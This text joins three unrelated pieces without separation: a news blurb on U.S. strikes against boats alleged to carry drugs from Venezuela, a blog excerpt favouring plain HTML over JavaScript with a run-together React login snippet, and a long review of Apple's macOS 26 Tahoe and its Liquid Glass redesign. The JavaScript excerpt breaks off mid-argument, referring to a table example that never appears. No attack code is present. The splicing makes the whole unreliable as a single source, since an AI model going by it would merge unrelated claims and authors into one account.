On Monday, President Trump announced the U.S. bombed a boat in international waters, killing three people. The attack was the second to target what the Trump administration claims are drug smugglers from Venezuela. A previous strike on another boat killed 11 people. In a third incident, the U.S. Navy raided a fishing boat in Venezuelan waters, detaining nine fishermen for eight hours. This escalating U.S. military action follows a secret directive that Trump signed approving the use of military force in Latin America and an ongoing buildup of U.S. military presence in the Caribbean.
“We have a very clear example of political theater, an attempt at provocation, an ongoing effort at regime change, and the strategy of trying to use the military to interdict drug trafficking, which has failed incredibly in Mexico, Colombia, everywhere else the U.S. has applied it,” says Venezuelan historian Miguel Tinker Salas, who adds the Trump administration is “misleading the public in indicating that these were drug traffickers with no evidence whatsoever.” He says its attempt to manufacture a crisis in Venezuela is reminiscent of the lead-up to the U.S. war on Iraq.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
I’ve worked on
so many projects recently
that were more complicated than they needed to be because they used JavaScript to generate HTML.
JavaScript is…
Slower to load
Slower to run
More prone to breaking
Harder to read and reason about
Doesn’t actually look like the final output
It’s inferior to just using HTML in nearly every way.
I’m not saying
never
use JavaScript, though. I think JS is great at augmenting and enhancing what’s already there, and adding interactivity that cannot (yet) but handled with HTML.
Let’s look at two examples…
Submitting a form
I see this a lot in React and JSX.
Every input in a form has an
input
listener on it. Any changes to that input update a state property. That property is used to set the value of the input, creating this weird circular logic.
(
This approach is called “controlled inputs” in React-land, and some devs are slowly moving away from it, finally.
)
The form submit is often also tied to clicking a
<button>
rather than submitting a form, meaning that hitting enter on an input won’t submit the form. This removes a native accessibility feature.
functionLogin(){const[username,setUsername]=useState('');const[password,setPassword]=useState('');functionhandleSubmit(){if(!username||!password){// Show error message
return;}fetch('/login',{method:'POST',body:JSON.stringify({username,password}),});}return(<formonSubmit={event=>event.preventDefault()}><labelfor="username">Username</label><inputid="username"type="text"onInput={event=>setUsername(event.value)}value={username}/><labelfor="password">Password</label><inputid="password"type="password"onInput={event=>setPassword(event.value)}value={password}/><buttononClick={handleSubmit}>Submit</button></form>);}
But if a server has to do the work of getting that information and sending it back to you anyways, it
could
also just send the
<table>
HTML, which you could then render into the UI.
Liquid Glass brings translucent sheen to the typical batch of iterative changes.
The last time Apple gave macOS a fresh design was in 2020's
macOS 11 Big Sur
.
That release was relatively light on new features and heavy on symbolism. Big Sur is also when Apple finally jettisoned the "10" in Mac OS X after two decades. More importantly, it was the first release installed on then-new Apple Silicon Macs, the culmination of a decade-plus of in-house chip design that began with
single-core, low-power iPhone and iPad chips
and culminated in something
powerful enough for the Mac Pro
.
Today's macOS 26 Tahoe release holds up a translucent, glassy mirror to the Big Sur update. It comes with an all-new look, one that further unifies Apple's design language across all its operating systems. And it even throws out the old version numbering system and introduces a new one.
But if Big Sur was the beginning of an era, Tahoe is the end of one. This will be the final release to support any Intel Macs at all—and it runs on just a bare handful of them, ending support for all Intel MacBook Airs and most other Intel Macs besides. Starting with next year's release, Apple will be able to start jettisoning all Intel code from macOS, including (eventually) the Rosetta translation technology that allows Apple Silicon Macs to run Intel code at all.
As we do every year, we'll look at, and underneath, the shiny surface of the new release. If you have an older Intel Mac that isn't supported, is there anything here that might make you want to upgrade? Is Liquid Glass disruptive or revelatory or just another layer of cosmetic polish on top of the Mac's familiar time-tested Macintosh interface? Let's dive in.
Table of Contents
System requirements and compatibility
Tahoe drops many 2018, 2019, and even 2020-vintage Intel Macs that could run last year's Sequoia, plus the late 2017 iMac Pro.
Here are the supported systems:
All Apple Silicon MacBook Airs, MacBook Pros, iMacs, Mac minis, Mac Studios, and Mac Pros with an M1, M2, M3, or M4-series chip.
2019 16-inch MacBook Pro
2020 13-inch MacBook Pro with four Thunderbolt 3 ports (but
not
the version with two Thunderbolt ports)
2020 iMac
2019 Mac Pro
That support list is rough news for owners of a couple of early-2020 laptops or anybody who bought 2018's Mac mini toward the end of its life (Apple sold some configurations all the way through January 2023).
It's especially difficult this year to divine why Apple is dumping some Intel Macs and keeping others around;
in general,
Apple drops Macs that rely on older Intel-integrated GPUs like the UHD Graphics 630 or Iris Plus Graphics 615 or 645; the 16-inch MacBook Pro uses one, but it's at least backed up by a dedicated AMD Radeon chip. The 10th-generation Intel chip in the 13-inch MacBook Pro makes the cut, but the marginally slower iteration of the same hardware in the 2020 Intel MacBook Air does not.
The early 2020 Intel MacBook Air is barely 5 years old, and its updates have already dried up.
Credit:
Apple
But whatever side of the line your Intel Mac falls on, at least we all have closure now—a publicly announced, predictable timeline for the end of Intel support. Macs running 2023's macOS 14 Sonoma get one more year of Safari and security updates; 2024's macOS 15 Sequoia gets two more years; and Tahoe's security updates will dry up in mid to late 2028. The full version of Rosetta 2, the Intel-to-Arm app translation layer that keeps most Intel apps running on Apple Silicon Macs, will go away in macOS 28 in late 2027, though Apple says some traces of it will remain after that to support older games.
Next year's macOS release will be the first to require Apple Silicon—but at that point, we'll hopefully get at least a handful of years where
no
Macs get dropped from the support list, something that hasn't happened
since 2017
(!).
Other system requirements
Though the Apple Silicon-only era won't officially start until next year, there's a long list of new and old features that already only function on Apple Silicon Macs.
Anything that touches Apple Intelligence at all—from summarizing notifications to Image Playgrounds—wants an M1 chip or better. The nice thing is that these features will run on
any
Apple Silicon Macs, from an M1 with 8GB of RAM up through an M4 Max or M3 Ultra. But the list of things Intel Macs can't do is getting pretty long:
Metal 4 and features that require it, including frame generation.
Features under the Apple Intelligence umbrella:
Genmoji
Image Playgrounds
Notification summaries
Writing tools
Live translation in the Phone, FaceTime, and Messages apps
Other features, including those from older macOS versions, that require Apple Silicon:
Running iOS/iPadOS apps
Spatial Audio in FaceTime when using AirPods
The 3D globe and more detailed renderings of cities in Apple Maps
On-device voice dictation, with no Internet connection required and no time limit
Portrait Mode in FaceTime
Live Captions transcriptions in FaceTime or any other app
"Reference mode," which lets you use a 12.9-inch M1 or M2 iPad Pro or any M4 iPad Pro "as a secondary reference display" in Sidecar mode
Inserting emoji using voice dictation
Game mode, which limits background tasks and reduces Bluetooth latency when enabled
High-performance mode in the Screen Sharing app
Getting rid of the "Hey" in "Hey Siri"
Running games built with the Game Porting Toolkit
What isn’t ready for launch yet?
It has become common practice for Apple to announce features at WWDC that it doesn't plan to ship in the x.0 release of the software; those features usually hit somewhere in the x.1 to x.4 updates, at which point the current OS shifts into a lower-key, mostly maintenance mode as Apple's development efforts shift toward next year's version.
The big missing piece for Tahoe and Apple's other fall releases is the new "more personal Siri," a version of the voice assistant that Apple plans to make more capable by backing it up with a large language model that can work with content on your device or in your iCloud account. This feature was somewhat infamously promised as part of last year's release but got bumped back after development difficulties. Apple executives claim that underlying improvements to Apple Intelligence in macOS 26 and the other operating systems will make it possible to ship the new Siri this year.
Otherwise, it doesn't look like there's much in the "later this fall/coming next year" category for this year's releases. If Apple has decided to keep its focus on the ecosystem-wide aesthetic redesign and a long-awaited high-stakes Siri update for this particular update cycle, I can hardly blame them.
Options (or lack thereof) for owners of unsupported Macs
Usually, we talk about what options Intel Mac owners have if their hardware is still in decent shape and they'd like to continue using it with different software, but we're getting to the point where Intel Mac owners are just running out of options.
In past years, Windows 10 has been a workable alternative to tossing functional hardware, and it's the only other operating system that Apple officially supported on the hardware, thanks to Apple's Boot Camp software and drivers. But Windows 10's security updates dry up in October of this year (or October 2026, if you
jump through the hoops to sign up for a year of extra patches
), which actually makes Windows 10
worse
on many Intel Macs than just staying on macOS.
But installing Microsoft's big yearly update patches is a pain, and it's one you'll have to endure if you want to keep getting those security updates. You'll deal with any instability caused by using Apple's aging Windows 10 drivers on a new OS, and the possibility that Microsoft could decide to change Windows' underlying hardware requirements in a way that makes it impossible to install. (This has already happened once—2024's big update quietly made it impossible to run Windows 11 on some late-'00s-into-early-2010s hardware that had been able to use the first few versions.)
You could find some refuge in one of the many flavors of Linux (Ubuntu, Fedora, ChromeOS Flex, and innumerable others), but you'll run into problems on newer Macs with Apple T2 chips. The T2 is used by macOS to handle all kinds of things that are handled by other chips in PCs—video encoding and decoding, disk encryption, storing TouchID fingerprints, enabling the webcam and trackpad, and as an SSD controller, to name a few.
For Linux distributions to be able to do all of these things with the T2, Apple would need to either open up access to it, or someone in the Linux community would need to reverse-engineer support for it. Neither of those things has happened. And given the age and relative obscurity of the T2 hardware, it doesn't seem enormously likely at this point.
Your best option may be the
OpenCore Legacy Patcher
(OCLP) project, which uses a lot of community-driven "Hackintosh" tools to do for old Intel Macs what they do for generic Intel and AMD hardware: get the latest macOS running on hardware Apple doesn't support.
Each year, that task gets harder, as Apple strips more of the underlying Intel support files out of new macOS versions. A lot of what OCLP does is patch in files from older macOS versions to restore that missing hardware support, and the more stuff that goes missing, the higher the degree of difficulty. On
this year's list
of "challenges": Fusion Drive support, legacy graphics drivers, FileVault disk encryption support, drivers for older Wi-Fi, Bluetooth, and USB hardware, and support for both the Apple T1 and Apple T2 chips.
For the Apple T2, the challenge for OCLP is similar to the challenges for Linux: a lot of hardware features require it to work, and Apple hasn't documented it or opened it up so that anyone else can use it. The 2018 MacBook Air, the first T2-equipped model to be dropped, still doesn't work with last year's macOS Sequoia. The additional T2 models that Tahoe dumps will be similarly difficult to support.
The OCLP team claims to have made "some progress" on T2 support, but these Macs still won't boot Tahoe, and it may or may not ever become possible.
Many Intel Macs still have between one and three years of security update support left; for unsupported Macs, your best bet is probably to keep using your older but officially supported macOS version for as long as it's patched. You'll miss out on newer iCloud and iMessage features, but things will
mostly
continue to function as they currently do, and it can buy you time to put together money for a new machine (while buying the OCLP project time to try to add support for your Mac, if it's not already supported). Just know that you're getting to the point where staying up to date and patched is going to require newer hardware.
Branding: What’s in a number?
The first thing to note about the branding of macOS 26 is the number itself. The jump from 15 to 26 isn't as jarring as five years ago, when we finally lost the "10" that had given Mac OS X part of its name for so many years. But it's still potentially confusing in the short term, even if in the long term I do think it makes more sense for an ecosystem as tightly integrated as Apple's to unify around consistent version numbers up and down the entire product stack.
As with new cars, the "26" here is year-based but forward-looking—it's numbered for the year where it will spend nine or so months as the actively developed, currently supported version of the operating system, and not for the year of its release.
On the technical side, just like with the jump from version 10.15 to 11.0, macOS 26 can identify itself as macOS 16 to apps and scripts that might otherwise be broken by the jump.
As detailed
by the Eclectic Light Company's Howard Oakley, apps developed targeting macOS versions 15 or below will see "16," while apps developed targeting macOS 26 or newer will see "26." Different kinds of scripts have slightly different compatibility behaviors.
What’s in a name?
Tahoe is Apple's 13th California-themed macOS codename, and while the company has stuck a couple of pins in the southern part of the state, the majority of the releases stick within a couple of hundred miles of Apple's Bay Area stomping grounds. Tahoe is one of those.
I am not a California native, but I usually take a little time to read about whatever landmark Apple has named its newest release after. I don't actually think that the codenames signal anything in particular about Apple's goals or intents for a given release, but it is usually fun to work backwards from the name to an explanation.
Nestled in
the Sierra Nevada mountain range
, Lake Tahoe narrowly misses out on a range of superlatives, in terms of US-based freshwater lakes: It's smaller in volume than the Great Lakes, and it isn't as deep as Oregon's Crater Lake. But it's large and deep enough to have inspired tales of its own Loch Ness Monster-style cryptid ("Tahoe Tessie"), among multiple other urban legends about the frozen bodies of mafia victims or volcanic tunnels that connect it to other lakes.
Tahoe is also one of a few macOS releases (including Sierra and Mojave) where the California landmark in question is shared with the neighboring state of Nevada. Partly because it's a body of water and partly because the distinctive angle in California's eastern border actually starts
in
Lake Tahoe, the exact location of the border has apparently been the matter of some dispute going as far back as the founding of California.
Both Nevada and California defined their state boundaries in terms of geographical coordinates, and there's apparently some variance as to where those coordinates are depending on the precise shape you use
to model the surface of the Earth
—one boundary marker on the US National Register of Historic Places
notes
that six different geographical surveys of California's border were conducted between 1855 and 1900, and
none
of them agreed on where the border was. The dispute was at its liveliest when the states and the people in them were trying to lay claim to mineral deposits on the border, but it wasn't formally settled until it
went up to the Supreme Court in 1980
.
So by choosing Tahoe as the name for this year's macOS release, Apple doubtlessly (probably) thought that the clear waters of Lake Tahoe would be a good match for the added motion and translucency of Liquid Glass. The company probably
didn't
mean to draw attention to the fact that Liquid Glass occasionally renders the boundaries between different parts of a window indistinct, fomenting border disputes. But it ended up being weirdly appropriate anyway. It's fun to learn things!
Installer and installation
A near-decade's worth of macOS installer icons—and finally, one is different!
Credit:
Andrew Cunningham
This year's installer icon is one of the ones that finally justifies years' worth of effort spent tracking and talking about the changes in macOS installer icons. Apple's system-wide quest to replace all app icons with rounded squares has extended to the macOS install icon, which has shed its "circle with an arrow pointing down at it" appearance for the first time in modern macOS' 25-year history. It used to be a circle pointing to a CD or DVD; after that it was just a circle because it was a circle. No longer!
The new icon still uses the "abstract" version of the Tahoe default wallpaper—a wavy, predominantly blue bunch of colorful swirls with a faintly glassy texture that recalls the look of Liquid Glass and the motion of water. This image is made into a rounded square, with a Liquid Glass-style downward-pointing arrow hovering on top of it (there's still a circular icon buried in the installer app, without the arrow—you could use it to make a version of the old icon if you're feeling nostalgic.)
The default Tahoe desktop wallpaper is a photorealistic image, a Dynamic Wallpaper (meaning it's both wallpaper and screensaver, with seamless switches between the two) of Lake Tahoe in Day, Morning, Evening, and Night varieties that can change according to the time of day, whether your Mac is in Light or Dark Mode, or user preference (my favorite is Evening).
The installer itself is roughly 16.9GB in size. If you're creating USB install media for use on multiple Macs, you'll definitely need a 32GB or larger stick, rather than 16GB.
The install process itself isn't dramatically different from the last few macOS releases, except that it will be your first exposure to the left-justified text that's now used throughout system dialogs. That text has been center-aligned for so long that it's still disorienting to me even after months of using Tahoe daily, like viewing a website on a bad Internet connection where the CSS doesn't load. The part of my brain that insists on building perfectly symmetrical buildings in
Minecraft
doesn't like the asymmetrical whitespace that left-aligned text creates.
If you're upgrading to Tahoe from an older macOS version, you'll be shown a brief reel of demo videos highlighting some of the release's most user-noticeable features: the Liquid Glass UI, the new color customization options, some of the changes to Spotlight search, and the presence of the Phone app. Apple's other updates this year come with similar new-feature sizzle reels. You won't see these videos if you're setting up a brand-new Mac, or one where you've totally reinstalled macOS from scratch.
Free space: Hope you have GB to spare
The amount of free space needed for a baseline macOS install generally climbs from year to year, with some exceptions for years when a particularly large tranche of Intel-specific code gets stripped out (next year, maybe?).
These numbers will vary slightly for different Macs. We have numbers for a base macOS 15.6.1 install and a base macOS 26.0 GM install inside a virtual machine made using Apple's built-in VM framework on an M1 MacBook Air, and we have the same numbers from bare-metal installations on a 15-inch M4 MacBook Air. For the M4 Air, we looked at the numbers with and without Apple Intelligence enabled, since turning those features on requires a multi-gigabyte download of the various models Apple is using to make its AI features work.
System
Preboot
Data
Recovery
All volumes
macOS Sequoia 15.6.1, virtual machine
11.3GB
6.1GB
3.2GB
1.0GB
21.6GB
macOS Tahoe 26.0 RC, virtual machine
12.0GB
6.7GB
7.5GB
1.2GB
27.4GB
macOS Sequoia 15.6.1, M4 MacBook Air
11.3GB
7.1GB
4.9GB
1.1GB
24.4GB
macOS Tahoe 26.0 RC, M4 MacBook Air
12.0GB
7.7GB
10.7GB
1.2GB
31.6GB
Sequoia, M4, Apple Intelligence
11.3GB
7.1GB
11.7GB
1.1GB
31.2GB
Tahoe, M4, Apple Intelligence
12.0GB
7.7GB
18.3GB
1.2GB
39.2GB
The bad news is that Tahoe needs a lot more storage space than Sequoia—a whole lot. In a virtual machine, a fresh Sequoia install used 21.6GB and a Tahoe install used 27.4GB, a nearly 6GB increase. On the M4 MacBook Air, it's a 7.2GB increase.
The gap widens even further with Apple Intelligence enabled—a round 8GB increase on the M4 Air. A fresh install of Sequoia with Apple Intelligence installed takes around the same amount of disk space as an install of Tahoe
without
Apple Intelligence. Tahoe with Apple Intelligence enabled needs twice as much space as a fresh Big Sur install did
five years ago
.
FileVault, on by default
One other tweak to the install process is the default behavior for Apple's FileVault disk encryption. If you sign in to an Apple account as part of setting up macOS, FileVault now turns on automatically, and also automatically uses your Apple Account for recovery in the event something goes wrong.
This is a departure from previous macOS versions, which made FileVault optional and gave you other, non-cloud options for backing up your recovery key (including printing it out or just writing it down).
But if you decline to sign in with an Apple Account during setup, just creating a local account, the macOS installer
offers
FileVault encryption, generating a recovery key that you can write down and store elsewhere, but it's possible to skip FileVault entirely. Automating disk encryption and using an online account to sign in mirrors how Microsoft handles disk encryption in modern versions of Windows. But Microsoft tries to require you to use a Microsoft Account and steadily
makes that restriction harder and harder to get around
. Apple, at least, still has a big "no thanks" button as part of the setup flow.
Liquid Glass
The macOS 26 Tahoe release and its new Liquid Glass user interface theme.
Credit:
Andrew Cunningham
"Liquid Glass" is Apple's branding for the ecosystem-wide reskinning that all of its operating systems are getting this year, its most substantive and comprehensive visual redesign since introducing the "flat" aesthetic of iOS 7 back in 2013.
Liquid Glass isn't a return to the days of "skeuomorphism," when the company's apps tried to mimic the look of real-world materials like brushed metal, paper, and glass in occasionally nonsensical ways. It's more like: If the default background in the iOS 7 era was a totally flat, featureless field of white or black or gray, the default background in the iOS 26 era is now a frosted sheet of glass. These glass sheets allow more of whatever is "underneath" them to shine through, and they have more visible edges that mimic the way that glass catches and reflects light.
The audio slider turns glassy when being dragged.
Credit:
Andrew Cunningham
That's the "glass" part. The "liquid" part is a greater sense of motion and bounciness throughout the operating systems when pulling up notifications or summoning the Control Center or interacting with sliders or checkboxes. I do not find myself with lots of opinions one way or the other about the "liquid" part; a little playfulness never hurt anyone, and the animations here don't commit the same sin as some of the new animations in iOS 7 did: Waiting for them to happen
does not actually increase the amount of time you'll spend waiting for things to happen
. Good enough for me!
Bouncy Liquid Glass toggles in the Settings app.
Credit:
Andrew Cunningham
Once you filter out YouTube engagement-bait ("liquid ass! liquid ass!" they gleefully chirp in unison, each one confident that they've been the first to arrive at the World's Most Obvious Joke), the general response to the Liquid Glass is "
eh, you get used to it
."
This is how I've felt myself responding to it—in macOS especially, it mostly just fades into the background, and you can keep using your computer the way you could before. Hardly a ringing endorsement. But when you watch a fairly prominent and storied company like Sonos
eat itself alive over a bad app redesign
or when you remember
the growing pains of iOS 7
, it's easier to appreciate a visual overhaul that's different without being disruptive.
With that being said, the increased translucency of all these glassy layers does sometimes create legibility problems—problems that are more frustrating because of Apple's visible efforts to fix or work around them.
Consistently inconsistent
The Photos app uses the glassier style for the top of its window, with both the color and the shape of content under the UI staying pretty visible as it hits the top of the window.
Andrew Cunningham
Apple has defined two looks for the top part of a Liquid Glass window. One, as visible in the Photos app, is to let more of the underlying content shine through the top of the window, dimming it and diffusing it less aggressively. The other, visible in some views of the Finder or in the Files app for the iPad, uses what Apple calls a "hard-style" effect, fading and diffusing underlying objects more aggressively right where the window content meets the title bar or category labels. The stuff underneath is still visible, but readability is prioritized above translucency.
Those two approaches also extend to other UI elements. Compare the look of the Notification Center in iOS 26 and macOS 26—the iOS 26 bubbles really do have the appearance of thin sheets of lightly frosted glass, where the macOS bubbles just give you the vaguest impression of what's lying underneath them.
Other macOS menu bar items, when expanded, use a less translucent style that more closely matches what Apple is doing with notifications. Spotlight does, too. You can see some restraint in Safari's address bar and header area, for example, which are a hint more translucent than in Sequoia but considerably more opaque than the same aggressively light-bending glassy UI in iOS 26. In terms of the built-in system-level features, it's really only Control Center that seems to use the clearer, glassier look.
It's worth remembering that even at the height of Flatness Fever in the mid-2010s, the Mac's user interface always
retained some depth and texture
, even as Apple ratcheted up the contrast, vibrancy, and translucency. In the same way, the Mac's version of Liquid Glass looks slightly toned down compared to the same styling in iOS and iPadOS, with a lot less shininess and translucency (not none, but less).
Individual apps are split a bit more evenly between the less-translucent and more-translucent styles. Safari's address bar and header area are a hint more translucent than in Sequoia but considerably more opaque than the same aggressively light-bending glassy UI in iOS 26.
The Safari address bar in iOS: more glassy, with clearly visible colors and shapes underneath, and more bending of light around the edges.
Andrew Cunningham
But apps like Photos and Messages share more underlying code with their iOS and iPadOS equivalents. The header/title bar area in the Photos app is everything that the header/title bar in Safari isn't: aggressively glassy all the way to the edge. Apple diffuses the color and shape of underlying content somewhat and dims it a little so that all of the UI that's up there at the top of the screen stays legible, which
usually
works but occasionally doesn't.
Ars Technica macOS reviews have commented on and complained about the conflict between translucency and legibility in macOS for
literally decades
, but Liquid Glass really does kick things up to an entirely new level, and it's easier than it ought to be to take screenshots where things just look
bad
.
Liquid Glass is at its worst when text or images with lots of fine details slide underneath other text. It's visible in the way the text labels from the Settings app conflict with text in the Search box, or when details in photos make the top parts of the Photos app borderline illegible, or in the way some of the buttons are obliterated when you're using a background for a group chat in the Messages app.
Text in and underneath the Search bar blurring together into a fuzzy mess.
Andrew Cunningham
You can tell Apple is aware of the problem because of some of the things it has implemented to try to keep things readable in the face of glassy translucency. Scrolling through the App Store or the Games App or Photos, the buttons at the top of the window subtly change their brightness and opacity. Text in the Messages app tries to cast a faint shadow in an attempt to stay readable when positioned over top of a loud background image. All of these subtle, automatic adjustments are happening by design, and some of them work better than others.
In apps that use the glassier, more translucent style, gray text, or text that has its own translucency effect, is always in danger of getting washed out, as is any text without some kind of backing layer between it and the content underneath (see how texts in the Messages app stay readable even when names and timestamps get washed out).
Tweaks Apple has made to the translucency levels throughout the beta process have improved this across all its platforms, which I'd expect to keep happening post-release. I also think Liquid Glass
mostly
looks better in motion than it does in screenshots. It's not hard to take still images of individual elements that look bad or weird, but these cherry-picked stills don't necessarily capture what it actually looks like in active daily use.
I'd like to see two things as Liquid Glass evolves: a commitment to creating and maintaining legibility and contrast for any text that could ever sit directly on top of other text or images, and more consistency in the way Apple tries to address translucency problems across apps and the various bits and pieces of the macOS user interface. What I do
not
particularly want Apple to do is to point to the Reduce Transparency toggle in the Accessibility settings and say "if you don't like it then turn it off." Sure, it's nice to have that as an option, and it does address a
lot
of the individual gripes I've just highlighted here, but it's more of a workaround than a fix.
“Reduce transparency”: What you can control in the Accessibility settings
On that note, though, let's take a quick look at everything that happens to Liquid Glass when you
do
hit the Reduce Transparency toggle in the Accessibility settings.
As in older releases, windows in this mode will stop picking up a subtle color tint from whatever your desktop wallpaper is. Tahoe's disappearing menu bar background reappears naturally, with no visible trace of the translucency it used to have.
Menus, Spotlight, the Control Center, notifications, and any other UI element that could appear on top of any other UI element get rid of all translucency and transparency, just showing you text on top of a light or dark background. Sometimes, you'll still see those glassy outlines around the edges of things—the Control Center, Safari tabs, menus, and Spotlight are all places you can still see them. But sometimes those borders will disappear, too, like they do for notifications.
The most noticeable change to the new Liquid Glass-ified version of macOS is that Finder, Photos, Messages, and other apps regain a clearly delineated menu bar area. Text, buttons, and other elements become more consistently legible in this mode, and window content is no longer visible beneath them.
If you're having big problems with Liquid Glass and you don't want to wait for Apple to fix whatever problem you're having, the toggle can make the most bothersome aspects of the redesign go away. But it's a hacksaw, not a scalpel—if you mostly like Liquid Glass but have problems with it in one or two specific apps, it's an all-or-nothing proposition and not something you can turn off selectively.
Part of the Liquid Glass revamp is that the Mac's menu bar is going from translucent to fully transparent. The menu bar area still exists, and by default it still persists across the top of the screen at all times unless you're in Full Screen mode (unlike the iPad's now-you-see-me-now-you-don't menu bar). There's just no background on by default, and there's usually no effort made to diffuse or darken anything underneath the menu bar to make it more legible.
I say "usually" because the menu bar does still have some tricks up its sleeve. It will automatically shift from white text to black text based on whether you're using a dark or light-colored background, something that it could already do before. But under certain circumstances—when using some shades of gray as your background or an image that's dark in some areas but light in others—macOS will still draw an extremely subtle drop-shadow underneath the menu bar area to maintain legibility. You may never see this drop shadow, and I only noticed it showing up when I was specifically trying to make it show up. But it's still there as a kind of break-glass-in-case-of-legibility-emergency option.
But for wallpapers where the color or pattern could still possibly cause readability issues, a subtle drop shadow shows up underneath it automatically.
Andrew Cunningham
If this doesn't work, and you do want a menu bar background that doesn't require you to turn off transparency and translucency everywhere in the operating system, there's a new Menu Bar item in the Settings with a toggle to re-enable the background. That background
usually
works just like it used to in older macOS versions, but it's more visible against a lighter-colored background. There's not a "light" background version of it that shows up when you're using a darker wallpaper anymore—Apple seems to be assuming that white text on a dark background provides sufficient contrast for people who want it.
The other big menu bar-wide change in Tahoe is that many menu items get their own little glyphs now to go along with the text. Common system-provided menu items like "open" or "paste" or all the things under the Window menu automatically get new icons, even for apps that haven't been updated with Tahoe in mind. These are all pulled from
Apple's SF Symbols library
, which developers can pull from for their own custom menu bar icons.
An expansive Control Center
Customizing the Control Center and customizing the menu bar is done through the same interface.
Credit:
Andrew Cunningham
I mentioned the new Menu Bar area in the Settings app, but it's not just for determining menu bar translucency. It also serves as a replacement for the old Control Center settings, because there's more overlap between the menu bar and Control Center in Tahoe.
Tahoe offers toggles for the same handful of classic macOS menu bar items, including Spotlight, Siri, the battery meter, Wi-Fi, audio, Bluetooth, Time Machine, Fast User Switching, and a handful of others. But in Tahoe, the Control Center is getting dramatically more customizable—there are no longer fixed mandatory items that
must
appear in the Control Center, and there are a whole bunch of new controls besides. And each one of those controls can be added to the menu bar as its own standalone, top-level icon.
That means there's no Control Center item too minor or too niche to be added to the menu bar as a shortcut. If you're the kind of person who uses Shazam to identify ambient music half a dozen times a day, you can add it to the menu bar now. (I like a control that offers to automatically tile your windows for you, splitting the screen between your two most recent windows without all the clicking and/or dragging it usually takes.)
Most of these Control Center-derived menu bar items lack the finesse of the purpose-built menu bar items. Clicking the Wi-Fi or Sound settings or Dropbox's menu bar icon opens a little sub-menu without making you leave the app you're already in or dive into Settings, but many of the Control Center menu bar items are just buttons that open apps or turn settings on and off. The icons don't really change their state to reflect their status, like the Wi-Fi or Sound icons can.
Two stray observations about this newfound menu bar customization: First, this is one place where newer MacBooks' silly display notch is an active functional downgrade from a regular screen rather than a minor eyesore, because you can't fit as many menu bar icons. Second, Apple doesn't really limit you on the number of icons that can show up here—depending on the size of your screen, it's not too difficult to start eating into the space used for actual menus if you add too many.
If this happens, the menus will shove the menu bar icons over to the right a bit when you're actually digging into menus, so that you can see everything you need to see. Both visually and functionally, I prefer the menu bar with just a couple of extra frequently used icons in it. But it's one of a few places in Tahoe where Apple will actually
let
you make things kind of ugly before it will restrict your ability to change things. And on that note...
Infinite color options
Broadly speaking, Tahoe has six different visual styles, though many elements can be customized individually. Light mode with light icons adheres the most closely to the traditional look of macOS.
Andrew Cunningham
Since introducing Dark Mode in macOS 10.14 Mojave in 2018, macOS has included a handful of toggles for customizing the overall look of your Mac. Tahoe supercharges that ability, adding not just the relatively well-publicized dark and translucent icon options and colorful Finder folders but splitting up some existing options so that they can be customized independently. The result is a version of macOS that's more visually flexible than anything we've seen since
the old Mac OS Appearance Manager was still a thing
.
These are the appearance settings that Tahoe will let you customize independently:
Whether windows and apps are in Light or Dark mode.
Whether icons and widgets are in Light mode, Dark mode, transparent mode, or tinted mode.
The color of your folders, which also controls the tint of icons and widgets in tinted mode.
Your text highlight color.
Your "theme" color. This dictates the color used for things like menu selections and buttons in various apps. By default, your text highlight color and default folder color track this selection, but you can change them if you want.
Using tags, it's possible to give individual folders a different color from the rest of the folders on your system.
This isn't new to Tahoe, but if you want to add even
more
color, go into the Display settings in Accessibility and mess with your pointer outline and fill color.
The original introduction of Dark Mode also made it possible to make macOS more colorful, moving away from the Aqua and Graphite themes that defined macOS X for most of its run. But Tahoe opens things up to some truly discordant-looking color combinations.
New icons
Icons in macOS Tahoe aren't allowed to overhang the borders of the rounded square anymore. Sometimes the differences aren't too noticeable, though overall they have a little less personality now.
Credit:
Andrew Cunningham
All of Apple's first-party system icons have gotten a Liquid Glass-themed overhaul for Tahoe. Apple wants all icons, including its own, to be more consistent across its platforms. This means the last handful of icons that used the classic Mac "object sitting on top of some kind of image" style design have been removed from this version, replaced with the iOS-style rounded square. Those icons are also updated with Liquid Glass theming.
This icon shape has served the iPhone and iPad reasonably well for their entire existence, and Apple had already embraced the rounded square for most of its icons back in the Big Sur update. But the
mandatory
use of the shape, enforced at the operating-system level, is new, and it
is
too bad that first- and third-party apps that added small accents or overhanging elements to their own rounded squares are being discouraged from that behavior now.
For Apple's own icons, the new Liquid Glass icon updates are so subtle that it's hard to notice the difference, especially if the icon you're looking at is just a tiny patch of screen sitting in the Finder or on your Dock. Icons for Safari, the App Store, Messages, Reminders, and Music (among others) look almost the same as they did before.
Many icons get subtle Liquid Glass updates that look a lot like their previous versions.
Credit:
Andrew Cunningham
Icons with overhanging bits (the tabs in Contacts, the bookmark in Dictionary) or with external objects superimposed on them (the little magnifying glass for Preview, the disk with a stethoscope for Disk Utility, the caliper thing for System Information) have been changed more extensively. Sometimes the thing that was overhanging the edges of the icon just gets tucked within its borders somehow, and sometimes Apple has settled on much more abstract iconography instead. I am not sure, for example, what the wrench in the new Disk Utility icon is meant to be turning, but "not really knowing how to physically represent what solid-state storage looks like" turns out to be a recurring theme. At least the iPhone Mirroring icon now looks like something that was designed intentionally rather than a placeholder.
Even icons for system apps have been changed to conform to the new look.
Credit:
Andrew Cunningham
Apple has updated many of its system icons, including the old hard-drive-shaped icon for
your Mac's internal disk
. As with Disk Utility, the new icon looks basically nothing like any internal SSD that has ever existed; it could kind of look like an
external
SSD, but external disks get their own special icons.
Those system icon changes extend to folders in the Finder, which can change colors to match the highlight color you select in the Settings. Apps like Dropbox that use their own custom icons for some folders will need to be updated to support this feature, though—you may still run into icons with the old blue styling here and there.
Changing folder colors in Tahoe. Folders can also change colors individually using tags.
Credit:
Andrew Cunningham
But in most other cases, Apple seems happy to take older icons and automatically modify them to match Tahoe's theming rather than letting old, non-updated icons stick out as all the other icons on your system change their colors and tints.
Apps that don't conform to the rounded square shape are put into icon jail.
Credit:
Andrew Cunningham
If you have an app icon that
isn't
a rounded square, macOS takes it and stuffs it inside a rounded gray square (I've seen this referred to colloquially as "icon jail" or "squircle jail," and it feels apt). If your app was already using a rounded square without any overhang, Tahoe will add a glassy border around the edge of it. And if your icon uses flat colors on top of a flat background, Tahoe will even add a bit of a glassy look to the
interior
elements, too (Slack's icon is one good example of this).
How and why is this happening? It turns out that Tahoe treats icons differently than every other version of macOS going all the way back to the dawn of Mac OS X.
